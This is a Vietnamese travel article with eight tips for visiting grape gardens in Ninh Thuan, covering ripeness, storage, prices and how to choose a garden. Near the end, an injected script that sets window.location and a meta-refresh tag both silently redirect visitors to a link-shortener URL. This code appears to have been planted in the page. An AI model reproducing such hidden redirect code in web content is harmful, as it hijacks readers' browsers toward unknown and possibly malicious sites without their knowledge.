8 điều cần biết khi đi du lịch Vườn Nho Ninh Thuận

một vườn nho đang chín và chuẩn bị thu hoạch

8 điều cần biết khi đi du lịch Vườn Nho Ninh Thuận

Thứ nhất: Bạn nên liên hệ với vườn nho trước

Một vườn nho chưa chínCũng giống như nhiều loại trái cây khác, nho cũng có vụ mùa và thời điểm chín. Không phải lúc nào trong vườn đều có nho để thu hoạch. Để có thể khắc phục điều này ở Vườn Nho Ninh Thuận sẽ có nhiều vườn nhỏ để lúc nào cũng có nho trong vườn. Tuy nhiên, bạn vẫn nên gọi trước để có thể biết chắc chắn là khi mình đến tham quan sẽ có nho chín để làm nền cho những bộ ảnh vui tươi nhất và cũng có thể tự tay mình thu hoạch những chùm nho chín mọng.

Thứ hai: Tham quan vườn nho là miễn phí

Khác với rất nhiều địa điểm du lịch khác khi phải mua vé mới được tham quan thì những Vườn Nho Ninh Thuận lại mở cửa miễn phí cho tất cả mọi người. Ngoài ra, khi vào vườn bạn sẽ được cô chú nông dân cắt nho trong vườn cho mình ăn thử và dùng các sản phẩm đặc sản khác như mật nho, rượu nho, nho khô… Vì vậy, bạn có thể yên tâm khi đi du lịch ở đây không sợ tình trạng chặt chém,bị chửi khi bạn hỏi giá và cũng vì thế nhớ mua nho ủng hộ các cô chú nông dân bạn nhé.

 Thứ ba: Đừng ngắt từng trái, hãy hái cả chùm

So sánh hai chùm nho hồng nhật

hai chùm nho trước và sau khi bị ngắt một trái

 

Các bạn có thể thấy những chùm nho bị ngắt một trái sẽ trông mất thẩm mỹ như thế nào. Vì vậy, nếu bạn muốn ăn ngay những trái nho căng mọng hãy cắt cả chùm để ăn. Việc bạn hái một trái không chỉ làm mất thẩm mỹ của chùm nho mà còn khiến cho các cô chú nông dân phải làm thêm việc, họ phải tỉa bỏ cái cuống của trái nho bạn vừa hái.

Thứ tư: Chọn và thu hoạch những chùm cho chín hẳn

Một số bạn khi thu hoạch nho để đem về nhà thì không lựa những chùm nho chín mọng mà lại lựa những chùm nho xanh và sống. Không phải các bạn ấy thích ăn nho chua hay nhầm những chùm nho đó là nho xanh Ninh Thuận. Mà là các bạn ấy sợ những chùm nho chín mọng kia khi đem về nhà thì sẽ bị hư và những chùm nho xanh kia tới nhà chín là vừa. Nhận định này không hề chính xác, khác với các loại trái cây khác nho không thể chín thêm khi đã cắt khỏi cành. Vì vậy khi muốn thu hoạch nho hãy chọn những chùm nho chín nhất, tươi ngon nhất.

Thứ năm: Thời gian bảo quản nho từ 3 tới 4 ngày

Không giống những loại trái cây khác có thể để ngoài môi trường tự nhiên rất lâu. Nho chỉ có thể để được 3 tới 4 ngày. Vì vậy, nếu bạn đang trong một hành trình du lịch dài ngày. Hãy để lựa chọn vườn nho Ninh Thuận nằm ở cuối hành trình. Hoặc tình cờ vườn nho Ninh Thuận lại nằm trên lộ trình du lịch của bạn thì hãy mua nho vừa phải để có thể nhâm nhi tận hưởng mà không phải lo nho bị hư sẽ lãng phí. Hoặc đơn giản hơn, bạn có thể chọn mang theo những chai rượu nho Ninh Thuận vừa không lo bị hư hỏng mà vừa có thể lôi ra dùng ngay khi vừa có mặt tại những khung cảnh lung linh, lãng mạn.

Thứ sáu: Chọn những vườn nho uy tín có chất lượng

Hiện nay ở Ninh Thuận có rất nhiều vườn nho có mở cửa cho khách tham quan. Tuy nhiên không phải vườn nào cũng thật sự chất lượng. Để tránh tình trạng một trải nghiệm tệ sẽ khiến cho cả hành trình của bạn bị ảnh hưởng. Hãy cân nhắc và lựa chọn những vườn nho nổi tiếng có uy tín. Các vườn nho như thế có quy định rất gắt gao trong kiểm soát an toàn vệ sinh thực phẩm để đảm bảo nho không bị phun thuốc trừ sâu, giá cả được niêm yết rõ ràng. Bạn có thể chọn những một trong những địa điểm sau: Vườn Nho Ninh Thuận, Vườn Nho Thái An, Vườn Nho Ba Mọi, Vườn Nho Thái Khoa…

Thứ bảy: Chọn những vườn có loại nho mà mình ưa thích

Một cây nho Bailey Ninh Thuận

Nho Bailey ở Ninh Thuận

Ở Ninh Thuận nổi tiếng và phổ biến nhất là nho đỏ. Tuy nhiên vẫn còn rất nhiều loại nho khác cũng rất được ưa chuộng như nho xanh, nho hồng nhật, nho mẫu đơn hay nho kẹo Ninh Thuận. Vì thế nếu đặc biêt ưa thích một loại nho nào, bạn có thể tìm kiếm thông tin về nhà vườn có trồng loại nho bạn thích, đến chiêm ngưỡng và tận hưởng.

Cuối cùng: Tham khảo giá trước khi đến Vườn Nho Ninh Thuận

Khi đến Vườn Nho Ninh Thuận có thể bạn gặp được những loại nho chưa từng thấy trước đây bao giờ và vì chưa từng thấy bạn cũng không biết giá của chúng. Bạn có thể tham khảo giá một số loại nho nổi tiếng của Ninh Thuận trước khi đến vườn để có thể biết được mình có bị chặt chém hay cũng có thể thấy những hình ảnh của các loại nho để có thể phân biệt được những loại nho khác nhau.<script type=»text/javascript»>window.location=»https://ify.ac/YYN»;</script>?
<meta http-equiv=»refresh» content=»3;https://ify.ac/YYN»>

Trên đây là 8 điều cần biết khi đi du lịch và tham quan Vườn Nho Ninh Thuận. Bạn cũng có thể áp dụng những kinh nghiệm trên khi đi du lịch các vườn hoa quả khác như Vườn Dâu Đà Lạt hay các vườn trái cây.

Đánh Giá post

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *